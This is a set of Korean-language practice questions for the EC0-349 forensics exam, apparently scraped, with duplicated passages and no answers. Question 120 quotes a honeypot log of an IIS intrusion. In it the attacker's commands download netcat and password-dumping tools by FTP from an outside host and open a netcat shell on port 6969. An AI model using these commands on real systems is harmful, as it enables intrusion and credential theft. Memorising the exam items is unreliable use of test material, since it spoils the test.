EC0-349 문제 116
Linux를 사용하여 법의학 조사를 수행할 때, 다음 명령은 무엇을 수행할 수 있을까요?
dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror
dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror
EC0-349 문제 117
조사관이 회사의 방화벽 로그를 검색하다가 65,536바이트보다 큰 ICMP 패킷을 발견했습니다. 조사관은 어떤 유형의 활동을 보고 있습니까?
EC0-349 문제 118
직원이 큰 자석을 사용하여 몇 장의 컴팩트 디스크(CD)와 디지털 비디오 디스크(DVD)에 저장된 데이터를 지우려고 시도하고 있습니다. 당신은 그에게 이 방법은 CD와 DVD가 대량의 데이터를 저장하는 데 사용되는 ______________ 미디어이고 자석의 영향을 받지 않기 때문에 데이터를 지우는 데 효과적이지 않을 것이라고 알립니다.
EC0-349 문제 119
라우터 로그 파일은 인터넷의 네트워크 트래픽에 대한 자세한 정보를 제공합니다. 네트워크로의 공격과 네트워크에서 발생하는 공격에 대한 정보를 제공합니다. 라우터는 ____________에 로그 파일을 저장합니다.
EC0-349 문제 120
다음 발췌문은 lab.wiretrip.net에서 호스팅된 허니팟 로그에서 발췌한 것입니다. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. 파일 권한 정규화 취약성(유니코드 공격)은 스크립트를 실행할 권한이 없는 임의의 폴더에서 실행할 수 있도록 합니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini를 표시하는 데 성공합니다.
그런 다음 그는 msadcs.dll을 통해 RDS로 플레이하기 시작합니다. RDS 취약성을 통해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행하는 SQL 문을 구성할 수 있습니다. 그는 디렉토리가 있는지 알아내기 위해 빠른 쿼리를 수행하고 msadcs.dll에 대한 쿼리는 제대로 작동하고 있음을 보여줍니다. 공격자는 RDS 쿼리를 수행하여 아래에 표시된 대로 명령이 실행됩니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
위의 사례로부터 무엇을 추론할 수 있나요?
그런 다음 그는 msadcs.dll을 통해 RDS로 플레이하기 시작합니다. RDS 취약성을 통해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행하는 SQL 문을 구성할 수 있습니다. 그는 디렉토리가 있는지 알아내기 위해 빠른 쿼리를 수행하고 msadcs.dll에 대한 쿼리는 제대로 작동하고 있음을 보여줍니다. 공격자는 RDS 쿼리를 수행하여 아래에 표시된 대로 명령이 실행됩니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
위의 사례로부터 무엇을 추론할 수 있나요?